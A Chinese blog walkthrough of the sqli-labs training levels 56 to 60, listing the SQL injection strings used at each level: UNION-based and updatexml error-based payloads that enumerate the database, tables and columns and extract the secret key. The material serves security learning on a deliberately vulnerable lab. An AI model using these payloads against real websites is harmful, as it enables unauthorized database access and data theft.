当前位置: 首页 > article >正文

sqli-labs靶场(56-60)

article 2024/11/15 8:42:34

56关

?id=-1')union select 1,2,database()--+  看数据库

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+  看表

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='5k7pxhtjq1'--+  看列

然后就是key的值了

?id=-1') union select 1,group_concat(secret_RSHU),3 from 5k7pxhtjq1--+

57关

这关跟上边一样但是用双引号闭合

查数据库

?id=-1"union select 1,database(),version()--+

查到表名bxvue0mivj

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

在查看列

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='bxvue0mivj'--+

58关

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='o5jav1pxvu'),0x7e),1)--+
爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6HR1) from challenges.o5jav1pxvu),0x7e),1)--+

59关

查数据库?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

查到表名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='add90s9njg' limit 0,1),0x7e),1)-- q

id=1 and updatexml(1,concat(0x7e,(select secret_CYFO from add90s9njg limit 0,1),0x7e),1)-- q

60关

跟上边一样闭合不同

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q  查表

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='4cnqwjiczk' limit 0,1),0x7e),1)-- q  查列

id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from 4cnqwjiczk limit 0,1),0x7e),1)-- q


http://www.kler.cn/a/293257.html

相关文章:

  • vue请求数据报错,设置支持跨域请求,以及2种请求方法axios或者async与await
  • 前端-同源与跨域
  • 计算机毕业设计Python+Neo4j知识图谱医疗问答系统 大模型 机器学习 深度学习 人工智能 大数据毕业设计 Python爬虫 Python毕业设计
  • 基于yolov8、yolov5的番茄成熟度检测识别系统(含UI界面、训练好的模型、Python代码、数据集)
  • 【再谈设计模式】抽象工厂模式~对象创建的统筹者
  • 算法演练----24点游戏
  • 云计算之ECS
  • 常工院星闪节能团队参加悉尼大学设计交流项目
  • 中间代码例题
  • OSPF 协议介绍
  • Zipkin链路追踪②:如何集成?
  • 网络训练和推理过程
  • Android切换日夜模式导致Activity重建
  • C/C++的自由落体运动
  • 服务器数据恢复—磁盘坏扇区导致raid6阵列崩溃的数据恢复案例
  • 校园体育装备展-2025中国(深圳)国际学校体育装备展览会
  • 【Kafka】怎么解决Kafka消费者消费堆积问题?
  • windows 11/ubuntu Teredo 设置 (ipv4 转 ipv6)
  • 数据结构之——顺序表中基本操作的实现
  • 读懂以太坊源码(2)-重要概念Gas
  • 【Kubernetes 】k8s常用单词
  • Linux:深入剖析计算机软硬件架构
  • 单一职责原则介绍
  • Gartner报告解读:如何帮助企业完善数据分析与治理路线图
  • Jmeter模拟用户登录时获取token如何跨线程使用?
  • PostgreSQL技术内幕8:PostgreSQL查询执行器